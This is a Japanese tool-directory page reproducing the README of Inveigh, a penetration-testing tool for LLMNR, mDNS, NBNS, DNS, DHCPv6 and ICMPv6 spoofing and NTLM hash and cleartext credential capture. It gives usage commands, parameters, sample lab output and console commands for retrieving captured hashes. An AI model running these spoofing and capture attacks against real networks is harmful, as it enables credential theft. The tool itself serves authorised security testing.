Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Inveigh — .NET IPv4/IPv6 中間者攻撃ツール(ペネトレーションテスター向け) | Kitploit
ツール/GitHubGitHub/kevin-robertson/inveigh
ペネトレーションテストレッドチーミング
GitHubkevin-robertson/inveigh

Inveigh

.NET IPv4/IPv6 中間者攻撃ツール(ペネトレーションテスター向け)

リポジトリを見る
3.0k47219ヶ月前Kitploit レビュー済み

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Inveigh

Inveigh は、ペネトレーションテスター向けのクロスプラットフォーム .NET IPv4/IPv6 中間者攻撃ツールです。このリポジトリには、主要な C# バージョンと、従来の PowerShell バージョンの両方が含まれています。

概要

Inveigh は、パケットスニッフィングとプロトコル固有のリスナー/ソケットの両方を介して、なりすまし攻撃とハッシュ/資格情報のキャプチャを実行します。このツールのオリジナルの PowerShell バージョンの基礎となったパケットスニッフィング方式には、次のような利点があります。

  • Windows の SMB サービスを介した SMB NTLM チャレンジ/レスポンスキャプチャ
  • ホストシステム上の可視的なポートバインドが少ない

主な欠点は、昇格されたアクセス権が必要なことです。

現在のバージョンの Windows では、デフォルトで実行される UDP サービスによりポートの再利用が可能です。したがって、パケットスニッフィングは、使用中の UDP ポートを回避するための利点を提供しなくなりました。Inveigh の UDP リスナーはすべて、ポートの再利用を活用するように構成されています。

バージョンの説明

  • PowerShell Inveigh – 長年にわたって開発されたオリジナルバージョン。当面は、このバージョン (1.506) は追加のアップデートなしで提供されます。ドキュメントはこちらにあります。
  • C# Inveigh (別名 InveighZero) – オリジナルの C# POC コードと、PowerShell バージョンのコードのほとんどを C# に移植したものを組み合わせたもの。このバージョンは現在 C# 用に再構築されており、主要バージョンとして引き継がれています。

機能

C# バージョンの Inveigh には、次のプロトコルに対する攻撃が含まれています。

  • LLMNR [パケットスニファ | リスナー]
  • DNS [パケットスニファ | リスナー]
  • mDNS [パケットスニファ | リスナー]
  • NBNS [パケットスニファ | リスナー]
  • DHCPv6 [パケットスニファ | リスナー]
  • ICMPv6 [特権付きRAWソケット]
  • HTTP [リスナー]
  • HTTPS [リスナー]
  • SMB [パケットスニファ | リスナー]
  • LDAP [リスナー]
  • WebDAV [リスナー]
  • プロキシ認証 [リスナー]

Inveigh は、基盤となるプロトコルが両方をサポートする場合、IPv4 と IPv6 の両方で動作します。

クロスプラットフォーム対応

Inveigh の SDK スタイルのプロジェクトファイルは .NET 3.5、4.6.2、6.0 向けに設定されており、6.0 が Linux と macOS でも動作するバージョンです。

<TargetFrameworks>net35;net62;net6.0</TargetFrameworks>

既知の問題

  • パケットスニファは、RAW ソケットの設定の違いにより Windows でのみ利用可能です。Linux または macOS 用にコンパイルされた場合、パケットスニファは単に無効になります。代わりに、ポート 445 が開いていれば、Inveigh の SMB リスナーを使用できます。
  • macOS では、マルチキャストグループに参加するためのルートが必要です。私のテストでは、このプラットフォームで攻撃を実行するために、DHCPv6 マルチキャストのルートを追加する必要がありました。 sudo route -nv add -net ff02::1:2 -interface en0

実行

dotnet Inveigh.dll

Linux/macOS プラットフォーム向けビルド

  • ターゲットシステムに .NET 6.0 がインストールされている場合 dotnet publish -r linux-x64 -f net8.0 -p:AssemblyName=inveigh dotnet publish -r osx-x64 -f net8.0 -p:AssemblyName=inveigh

  • ターゲットシステムに .NET 6.0 がインストールされていない場合 dotnet publish --self-contained=true -p:PublishSingleFile=true -r linux-x64 -f net8.0 -p:AssemblyName=inveigh dotnet publish --self-contained=true -p:PublishSingleFile=true -r osx-x64 -f net8.0 -p:AssemblyName=inveigh

使用方法

デフォルトのパラメータ値は Program.cs の先頭にあります。コンパイル前にすべてを確認し、ニーズに合わせて設定することをお勧めします。すべての有効/無効パラメータは Y/N 値で設定できます。``` //begin parameters - set defaults as needed before compile public static string argCert = "MIIKaQIBAzCCC..." public static string argCertPassword = "password"; public static string argChallenge = ""; public static string argConsole = "5"; public static string argConsoleLimit = "-1"; public static string argConsoleStatus = "0"; public static string argConsoleUnique = "Y"; public static string argDHCPv6 = "N"; public static string argDHCPv6TTL = "30"; public static string argDNS = "Y"; ... //end parameters

root@kitploit:~
### パラメータヘルプ```
.\Inveigh.exe -?

Control:

  -Inspect        Default=Disabled: (Y/N) inspect traffic only.

  -IPv4           Default=Enabled: (Y/N) IPv4 spoofing/capture.

  -IPv6           Default=Enabled: (Y/N) IPv6 spoofing/capture.

  -RunCount       Default=Unlimited: Number of NetNTLM captures to perform before auto-exiting.

  -RunTime        Default=Unlimited: Run time duration in minutes.


Output:

  -Console        Default=5: Set the level for console output. (0=none, 1=only captures/spoofs, 2=no disabled, no informational, 3=no disabled, no filtered, 4=no disabled, 5=all)  

  -ConsoleLimit   Default=Unlimited: Limit to queued console entries.

  -ConsoleStatus  Default=Disabled: Interval in minutes for auto-displaying capture details.

  -ConsoleUnique  Default=Enabled: (Y/N) displaying only unique (user and system combination) hashes at time of capture.

  -FileDirectory  Default=Working Directory: Valid path to an output directory for enabled file output.

  -FileOutput     Default=Enabled: (Y/N) real time file output.

  -FilePrefix     Default=Inveigh: Prefix for all output files.

  -FileUnique     Default=Enabled: (Y/N) outputting only unique (user and system combination) hashes.

  -LogOutput      Default=Disabled: (Y/N) outputting log entries.


Spoofers:

  -DHCPV6         Default=Disabled: (Y/N) DHCPv6 spoofing.

  -DHCPv6TTL      Default=300: Lease lifetime in seconds.

  -DNS            Default=Enabled: (Y/N) DNS spoofing.

  -DNSHost        Fully qualified hostname to use SOA/SRV responses.

  -DNSSRV         Default=LDAP: Comma separated list of SRV request services to answer.

  -DNSSuffix      DNS search suffix to include in DHCPv6/ICMPv6 responses.

  -DNSTTL         Default=30: DNS TTL in seconds.

  -DNSTYPES       Default=A: (A, AAAA, SOA, SRV) Comma separated list of DNS types to spoof.

  -ICMPv6         Default=Enabled: (Y/N) sending ICMPv6 router advertisements.

  -ICMPv6Interval Default=200: ICMPv6 RA interval in seconds.
  
  -ICMPv6TTL	  Default=300: ICMPv6 TTL in seconds.

  -IgnoreDomains  Default=None: Comma separated list of domains to ignore when spoofing.



  -IgnoreIPs      Default=Local: Comma separated list of source IP addresses to ignore when spoofing.

  -IgnoreMACs     Default=Local: Comma separated list of MAC addresses to ignore when DHCPv6 spoofing.
  
  -IgnoreQueries  Default=None: Comma separated list of name queries to ignore when spoofing.

  -Local          Default=Disabled: (Y/N) performing spoofing attacks against the host system.

  -LLMNR          Default=Enabled: (Y/N) LLMNR spoofing.

  -LLMNRTTL       Default=30: LLMNR TTL in seconds.

  -MAC            Local MAC address for DHCPv6.

  -MDNS           Default=Enabled: (Y/N) mDNS spoofing.

  -MDNSQuestions  Default=QU,QM: Comma separated list of question types to spoof. (QU,QM)

  -MDNSTTL        Default=120: mDNS TTL in seconds.

  -MDNSTypes      Default=A: Comma separated list of mDNS record types to spoof. (A,AAAA,ANY)

  -MDNSUnicast    Default=Enabled: (Y/N) sending a unicast only response to a QM request.

  -NBNS           Default=Disabled: (Y/N) NBNS spoofing.

  -NBNSTTL        Default=165: NBNS TTL in seconds.

  -NBNSTypes      Default=00,20: Comma separated list of NBNS types to spoof. (00,03,20,1B)

  -ReplyToDomains Default=All: Comma separated list of domains to respond to when spoofing.

  -ReplyToIPs     Default=All: Comma separated list of source IP addresses to respond to when spoofing.

  -ReplyToMACs    Default=All: Comma separated list of MAC addresses to respond to when DHCPv6 spoofing.
  
  -ReplyToQueries Default=All: Comma separated list of name queries to respond to when spoofing.

  -SpooferIP      Default=Autoassign: IP address included in spoofing responses.

  -SpooferIPv6    Default=Autoassign: IPv6 address included in spoofing responses.

  -Repeat         Default=Enabled: (Y/N) repeated spoofing attacks against a system after NetNTLM capture.


Capture:

  -Cert           Base64 certificate for TLS.

  -CertPassword   Base64 certificate password for TLS.

  -Challenge      Default=Random per request: 16 character hex NetNTLM challenge for use with the TCP listeners.

  -HTTP           Default=Enabled: (Y/N) HTTP listener.

  -HTTPAuth       Default=NTLM: (Anonymous/Basic/NTLM) HTTP/HTTPS listener authentication.

  -HTTPPorts      Default=80: Comma seperated list of TCP ports for the HTTP listener.

  -HTTPRealm      Default=ADFS: Basic authentication realm.

  -HTTPResponse   Content to serve as the default HTTP/HTTPS/Proxy response.

  -HTTPS          Default=Enabled: (Y/N) HTTPS listener.

  -HTTPSPorts     Default=443: Comma separated list of TCP ports for the HTTPS listener.

  -IgnoreAgents   Default=Firefox: Comma separated list of HTTP user agents to ignore with wpad and proxy auth.

  -LDAP           Default=Enabled: (Y/N) LDAP listener.

  -LDAPPorts      Default=389: Comma separated list of TCP ports for the LDAP listener.

  -ListenerIP     Default=Any: IP address for all listeners.

  -ListenerIPv6   Default=Any: IPv6 address for all listeners.

  -MachineAccount Default=Enabled: (Y/N) machine account NetNTLM captures.

  -Proxy          Default=Disabled: (Y/N) proxy listener authentication captures.

  -ProxyAuth      Default=NTLM: (Basic/NTLM) Proxy authentication.

  -ProxyPort      Default=8492: Port for the proxy listener.

  -SMB            Default=Enabled: (Y/N) SMB sniffer/listener.

  -SMBPorts       Default=445: Port for the SMB listener.

  -SnifferIP      Default=Autoassign: IP address included in spoofing responses.

  -SnifferIPv6    Default=Autoassign: IPv6 address included in spoofing responses.

  -WebDAV         Default=Enabled: (Y/N) serving WebDAV over HTTP/HTTPS listener.

  -WebDAVAuth     Default=NTLM: (Anonymous/Basic/NTLM) WebDAV authentication.

  -WPADAuth       Default=Enabled: (Y/N) authentication type for wpad.dat requests. (Anonymous/Basic/NTLM)

  -WPADResponse   Default=Autogenerated: Contents of wpad.dat responses.

デフォルト (ローカルIPを自動検出)```

.\Inveigh.exe [] Inveigh 2.0 [Started 2021-06-15T00:08:37 | PID 12588] [+] Packet Sniffer Addresses [IP 10.10.2.111 | IPv6 fe80::3d3b:b73c:c43e:ed4e%2] [+] Listener Addresses [IP 0.0.0.0 | IPv6 ::] [+] Spoofer Reply Addresses [IP 10.10.2.111 | IPv6 fe80::3d3b:b73c:c43e:ed4e%2] [+] Spoofer Options [Repeat Enabled | Local Attacks Disabled] [-] DHCPv6 [+] DNS Packet Sniffer [Type A] [-] ICMPv6 [+] LLMNR Packet Sniffer [Type A] [-] MDNS [-] NBNS [+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80] [-] HTTPS [+] WebDAV [WebDAVAuth NTLM] [-] Proxy [+] LDAP Listener [Port 389] [+] SMB Packet Sniffer [Port 445] [+] File Output [C:\Users\dev\source\repos\Inveigh\Inveigh\bin\Debug\net35] [+] Previous Session Files [Imported] [] Press ESC to enter/exit interactive console

root@kitploit:~
### リスナー専用モード(無効化されたパケットスニファ)```
.\Inveigh.exe -sniffer n
[*] Inveigh 2.0 [Started 2021-06-14T10:48:16 | PID 20368]
[-] Packet Sniffer
[+] Listener Addresses [IP 0.0.0.0 | IPv6 ::]
[+] Spoofer Reply Addresses [IP 10.10.2.111 | IPv6 fe80::3d3b:b73c:c43e:ed4e%2]
[+] Spoofer Options [Repeat Enabled | Local Attacks Disabled]
[-] DHCPv6
[+] DNS Listener [Type A]
[-] ICMPv6
[+] LLMNR Listener [Type A]
[-] MDNS
[-] NBNS
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]
[-] HTTPS
[+] WebDAV [WebDAVAuth NTLM]
[-] Proxy
[+] LDAP Listener [Port 389]
[+] SMB Listener [Port 445]
[+] File Output [C:\Users\dev\source\repos\InveighZero\Inveigh\bin\Debug\net35]
[+] Previous Session Files [Imported]
[*] Press ESC to enter/exit interactive console
[!] Failed to start SMB listener on port 445, check IP and port usage.
[!] Failed to start SMB listener on port 445, check IP and port usage.

注意: パケットスニファを無効にすると、InveighはIPv4およびIPv6のSMBリスナーを起動しようとします。ほとんどのWindowsシステムでは、ポート445は既に使用中です。エラーを無視するか、-smb n を追加してください。

DHCPv6

DHCPv6スプーファーとIPv6 DNSスプーファーを起動します。注意: DNSはデフォルトで有効です。``` .\Inveigh.exe -dhcpv6 y ... [+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53] [+] DNS Listener [Type A] ... [+] [23:03:06] DHCPv6 [solicitation] from fe80::bd92:a800:60d0:8deb%2(test-wks1.lab.inveigh.org) [response sent] [+] [23:03:06] DHCPv6 [fe80::1348:1] advertised to [00:0C:29:F0:6E:16] [+] [23:03:06] DHCPv6 [request] from fe80::bd92:a800:60d0:8deb%2(test-wks1.lab.inveigh.org) [response sent] [+] [23:03:06] DHCPv6 [fe80::1348:1] leased to [00:0C:29:F0:6E:16]

root@kitploit:~
DHCPv6スプーファーを起動し、内部ドメインのみのDNSリクエストをスプーフィングしてください。```
.\Inveigh.exe -dhcpv6 y -replytodomains lab.inveigh.org
...
[+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53]
[+] DNS Listener [Type A]
...
[-] [23:10:30] DNS(A) request [test.inveigh.org] from fe80::6142:1%2 [domain ignored]
[+] [23:10:33] DNS(A) request [wpad.lab.inveigh.org] from fe80::6142:1%2 [response sent]

DHCPv6スプーファを起動し、ICMPv6 RAパケットも送信します。``` .\Inveigh.exe -dhcpv6 y -icmpv6 y ... [+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53] [+] DNS Listener [Type A] [+] ICMPv6 Router Advertisement [Interval 200 Seconds] ... [+] [23:12:04] ICMPv6 router advertisment sent to [ff02::1]

root@kitploit:~
DHCPv6スプーファーを起動し、ローカルホストからのリクエストに応答します。```
.\Inveigh.exe -dhcpv6 y -local y
...
[+] Spoofer Options [Repeat Enabled | Local Attacks Enabled]
[+] DHCPv6 Listener [MAC 52:54:00:FF:B5:53]

DNS

Aレコードに加えてSRVリクエストもスプーフィングします。``` .\Inveigh.exe -dnstypes A,SRV -dnshost fake.lab.inveigh.org ... [+] DNS Listener [Types A:SRV] ... [+] [23:21:05] DNS(SRV) request [_ldap._tcp.dc._msdcs.lab.inveigh.org] from fe80::242d:f99e:7534:b46f%2 [response sent]

root@kitploit:~
### <a name="ICMPv6"></a>ICMPv6
ICMPv6パケットを送信して、ローカルサブネットシステム上にセカンダリIPv6 DNSサーバを注入します。```
.\Inveigh.exe -icmpv6 y
...
[+] ICMPv6 Router Advertisement [Option DNS | Interval 200 Seconds]
...
[+] [23:35:46] ICMPv6 router advertisement with DNSv6 sent to [ff02::1]

ICMPv6パケットを送信し、ローカルサブネットシステム上に追加のDNS検索サフィックスを注入します。``` .\Inveigh.exe -icmpv6 y -dnssuffix inveigh.net ... [+] ICMPv6 Router Advertisement [Option DNS Suffix | Interval 200 Seconds] ... [+] [23:41:17] ICMPv6 router advertisement with DNS Suffix sent to [ff02::1]

root@kitploit:~
### <a name="LLMNR"></a>LLMNR
Aの代わりにAAAAリクエストを偽装します。```
.\Inveigh.exe -llmnrtypes AAAA
...
[+] LLMNR Listener [Type AAAA]
...
[-] [23:23:38] LLMNR(A) request [test] from fe80::bd92:a800:60d0:8deb%2 [type ignored]
[-] [23:23:38] LLMNR(A) request [test] from 10.10.2.201 [type ignored]
[+] [23:23:38] LLMNR(AAAA) request [test] from 10.10.2.201 [response sent]
[+] [23:23:38] LLMNR(AAAA) request [test] from fe80::bd92:a800:60d0:8deb%2 [response sent]

mDNS

mDNSスプーファーを起動し、QMリクエストに対してユニキャスト応答を送信します。``` .\Inveigh.exe -mdns y ... [+] MDNS Listener [Questions QU:QM | Type A] ... [+] [23:25:58] mDNS(QM)(A) request [test.local] from fe80::bd92:a800:60d0:8deb%2 [response sent] [+] [23:25:58] mDNS(QM)(A) request [test.local] from 10.10.2.201 [response sent] [-] [23:25:58] mDNS(QM)(AAAA) request [test.local] from 10.10.2.201 [type ignored] [-] [23:25:58] mDNS(QM)(AAAA) request [test.local] from fe80::bd92:a800:60d0:8deb%2 [type ignored]

root@kitploit:~
mDNSスプーファーを起動し、QMリクエストに対してマルチキャスト応答を送信します。```
.\Inveigh.exe -mdns y -mdnsunicast n
...
[+] MDNS Listener [Questions QU:QM | Type A]
...
[+] [23:28:26] mDNS(QM)(A) request [test.local] from 10.10.2.201 [response sent]
[+] [23:28:26] mDNS(QM)(A) request [test.local] from fe80::bd92:a800:60d0:8deb%2 [response sent]

NBNS

NBNS スプーファーを開始``` .\Inveigh.exe -nbns y ... [+] NBNS Listener [Types 00:20] ... [+] [23:33:09] NBNS(00) request [TEST] from 10.10.2.201 [response sent]

root@kitploit:~
### <a name="HTTP"></a>HTTP
ポート80でHTTPリスナーを起動(デフォルトで有効)```
.\Inveigh.exe 
...
[+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 80]
...

複数のポートでHTTPリスナーを起動する``` .\Inveigh.exe -httpports 80,8080 ... [+] HTTP Listener [HTTPAuth NTLM | WPADAuth NTLM | Ports 80:8080] ...

root@kitploit:~
### <a name="HTTPS"></a>HTTPS
ポート443でInveighのデフォルト証明書を使用してHTTPSリスナーを起動します。```
.\Inveigh.exe -https y
...
[+] HTTPS Listener [HTTPAuth NTLM | WPADAuth NTLM | Port 443]
...

SMB

SMBパケットスニッファを開始(デフォルトで有効)``` .\Inveigh.exe ... [+] SMB Packet Sniffer [Port 445] ...

root@kitploit:~
ポート445でSMBリスナーを起動```
.\Inveigh.exe -sniffer n
...
[+] SMB Listener [Port 445]
...

LDAP

ポート389でLDAPリスナーを起動する``` .\Inveigh.exe ... [+] LDAP Listener [Port 389] ...

root@kitploit:~
### <a name="WebDAV"></a>WebDAV
デフォルトで有効になっているWebDAVサポートを使用してHTTPリスナーを起動します。```
.\Inveigh.exe
...
[+] WebDAV [WebDAVAuth NTLM]
...

プロキシ認証

ポート8492でプロキシ認証キャプチャを有効にします。``` .\Inveigh.exe -proxy y ... [+] Proxy Listener [ProxyAuth NTLM | Port 8492] ...

root@kitploit:~
## コンソール

Inveigh には、ツールの実行中にアクセス可能なコンソールが含まれています(Esc キーを押して出入りします)。コンソールは、取得した認証情報やハッシュ、その他のさまざまな情報に簡単にアクセスできるようにします。コンソールのプロンプトは、クリアテキスト、NTLMv1、および NTLMv2 の取得数を、一意の数:合計数の形式でリアルタイムに更新します。なお、C2 経由で実行している場合、コンソールにアクセスできない可能性があります。

### 対話型コンソールヘルプ - ? または HELP を入力```
=============================================== Inveigh Console Commands ===============================================

Command                           Description
========================================================================================================================
GET CONSOLE                     | get queued console output
GET DHCPv6Leases                | get DHCPv6 assigned IPv6 addresses
GET LOG                         | get log entries; add search string to filter results
GET NTLMV1                      | get captured NTLMv1 hashes; add search string to filter results
GET NTLMV2                      | get captured NTLMv2 hashes; add search string to filter results
GET NTLMV1UNIQUE                | get one captured NTLMv1 hash per user; add search string to filter results
GET NTLMV2UNIQUE                | get one captured NTLMv2 hash per user; add search string to filter results
GET NTLMV1USERNAMES             | get usernames and source IPs/hostnames for captured NTLMv1 hashes
GET NTLMV2USERNAMES             | get usernames and source IPs/hostnames for captured NTLMv2 hashes
GET CLEARTEXT                   | get captured cleartext credentials
GET CLEARTEXTUNIQUE             | get unique captured cleartext credentials
GET REPLYTODOMAINS              | get ReplyToDomains parameter startup values
GET REPLYTOIPS                  | get ReplyToIPs parameter startup values
GET REPLYTOMACS                 | get ReplyToMACs parameter startup values
GET REPLYTOQUERIES              | get ReplyToQueries parameter startup values
GET IGNOREDOMAINS               | get IgnoreDomains parameter startup values
GET IGNOREIPS                   | get IgnoreIPs parameter startup values
GET IGNOREMACS                  | get IgnoreMACs parameter startup values
GET IGNOREQUERIES               | get IgnoreQueries parameter startup values
SET CONSOLE                     | set Console parameter value
HISTORY                         | get command history
RESUME                          | resume real time console output
STOP                            | stop Inveigh

対話型コンソールプロンプト

コンソールプロンプトにはリアルタイムのキャプチャ数が表示されます。``` C(0:0) NTLMv1(0:0) NTLMv2(0:0)>

root@kitploit:~
平文(ユニーク:合計) NTLMv1(ユニーク:合計) NTLMv2(ユニーク:合計)

## Quiddity

Inveighが使用するプロトコルライブラリは[ここ](https://github.com/Kevin-Robertson/Quiddity)にあります。

## 謝辞  
* Responder - https://github.com/lgandx/Responder  
* Impacket - https://github.com/SecureAuthCorp/impacket  
* mitm6 - https://github.com/fox-it/mitm6
ツールをダウンロード